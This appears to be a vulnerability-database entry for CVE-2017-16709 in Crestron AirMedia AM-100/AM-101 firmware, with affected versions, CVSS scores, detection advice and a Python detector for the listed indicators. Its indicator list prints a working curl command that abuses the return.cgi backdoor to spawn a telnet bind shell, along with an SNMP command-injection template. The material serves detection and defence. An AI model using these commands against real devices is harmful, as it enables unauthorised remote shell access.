CVE-2017-16709
published 2018-07-11


Priority: P269 (high)
CVSS 3.0: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Exploit: available
EPSS: 71.96% (99.4th percentile)
Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allow remote authenticated administrators to execute arbitrary code via unspecified vectors.

Affected (2 ranges)

Vendor     Product                     Version range   Fixed in
crestron   airmedia_am-100_firmware    < 1.6.0         1.6.0
crestron   airmedia_am-101_firmware    < 2.7.0         2.7.0

Detection & IOCs (extracted from sources)

path: /cgi-bin/return.cgi
command: curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "command=SetFlaghttphttp://192.168.88.253:1270||telnetd -l /bin/sh -b 0.0.0.0:1270|| whoamilol" --insecure https://192.168.88.250/cgi-bin/return.cgi
port: 1270
other: SNMP OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 (camFWUpgradeFTPURL)
other: SNMP OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 (firmware upgrade trigger)
command: ftp://1.1.1.1/$(${cmd})
filename: ftpfw.sh
command: pkill -f /etc/reboot.sh
  • Detect unauthenticated POST requests to /cgi-bin/return.cgi containing the string 'SetFlag' in the body, which is the backdoor trigger condition.
  • Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 for values beginning with 'ftp://' followed by shell command injection patterns (e.g., '$(' or '||').
  • Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 with Integer value 1, which triggers the firmware upgrade/command execution.
  • Alert on outbound telnet connections from Crestron AM-100/AM-101 devices, especially on non-standard ports such as 1270, which indicates a spawned backdoor shell.
  • Check SNMP sysDescr (OID 1.3.6.1.2.1.1.1.0) for 'Crestron Electronics AM-100' or 'Crestron Electronics AM-101' to identify vulnerable devices on the network.
  • The exploit payload is padded to exactly 255 bytes in the SNMP OctetString for camFWUpgradeFTPURL; anomalous 255-byte SNMP SET values on this OID are a strong indicator of exploitation.
  • The Metasploit module uses 'linux/armle/meterpreter_reverse_tcp' as the default payload; detect ARMLE Meterpreter reverse TCP connections originating from Crestron AM-100/AM-101 devices.
  • A valid SNMP read-write community string is required to exploit the SNMP injection vector; the module defaults to 'private'. Changing or restricting SNMP community strings limits exploitability.
  • The backdoor in return.cgi was silently removed in AM-100 firmware 1.6.0.2 with no public documentation; devices on earlier firmware remain vulnerable to unauthenticated exploitation.
  • AM-100 and AM-101 are considered EOL with no fix available for the SNMP injection; the Metasploit check module marks them unconditionally vulnerable regardless of firmware version.
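The return.cgi and SNMP SET detection rules listed above, implemented over a handful of constructed sample events. This is an added example, not code from cvebase or from any vendor or Metasploit source; the event dictionary layout and the function names are assumptions made for the example.

```python
import re

# Indicators taken from the detection notes for CVE-2017-16709.
RETURN_CGI = "/cgi-bin/return.cgi"
OID_FTP_URL = "1.3.6.1.4.1.3212.100.3.2.9.1.0"        # camFWUpgradeFTPURL
OID_UPGRADE_TRIGGER = "1.3.6.1.4.1.3212.100.3.2.9.5.0"  # firmware upgrade trigger
INJECTION_RE = re.compile(r"\$\(|\|\|")                  # '$(' or '||' after ftp://


def check_http_post(method, path, body):
    """Flag the return.cgi backdoor trigger: a POST whose body carries 'SetFlag'."""
    if method.upper() == "POST" and path == RETURN_CGI and "SetFlag" in body:
        return "return.cgi backdoor trigger (SetFlag in POST body)"
    return None


def check_snmp_set(oid, value):
    """Return the reasons an SNMP SET matches the firmware-upgrade injection rules."""
    reasons = []
    if oid == OID_FTP_URL and isinstance(value, str):
        if value.startswith("ftp://") and INJECTION_RE.search(value):
            reasons.append("camFWUpgradeFTPURL set to ftp:// URL with shell injection pattern")
        if len(value.encode()) == 255:  # exploit pads the OctetString to exactly 255 bytes
            reasons.append("camFWUpgradeFTPURL value is exactly 255 bytes")
    elif oid == OID_UPGRADE_TRIGGER and value == 1:
        reasons.append("firmware upgrade trigger set to Integer 1")
    return reasons


def is_crestron_airmedia(sysdescr):
    """True when an SNMP sysDescr string identifies an AM-100 or AM-101 (assumed format)."""
    return any(m in sysdescr for m in ("Crestron Electronics AM-100", "Crestron Electronics AM-101"))


# Constructed sample events (hypothetical, not captured traffic).
SAMPLE_EVENTS = [
    {"type": "http", "method": "POST", "path": RETURN_CGI, "body": "command=SetFlaghttp://example.invalid"},
    {"type": "http", "method": "POST", "path": "/cgi-bin/login.cgi", "body": "user=admin"},
    {"type": "snmp_set", "oid": OID_FTP_URL, "value": "ftp://1.1.1.1/$(${cmd})".ljust(255, "A")},
    {"type": "snmp_set", "oid": OID_FTP_URL, "value": "ftp://fw.example.internal/am100.bin"},
    {"type": "snmp_set", "oid": OID_UPGRADE_TRIGGER, "value": 1},
]


def scan(events):
    """Run every rule over a list of events and collect the matching reasons."""
    hits = []
    for e in events:
        if e["type"] == "http":
            r = check_http_post(e["method"], e["path"], e["body"])
            if r:
                hits.append(r)
        elif e["type"] == "snmp_set":
            hits.extend(check_snmp_set(e["oid"], e["value"]))
    return hits
```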

CVSS provenance

nvd  v3.0  7.2  HIGH    CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd  v2.0  6.5  MEDIUM  AV:N/AC:L/Au:S/C:P/I:P/A:P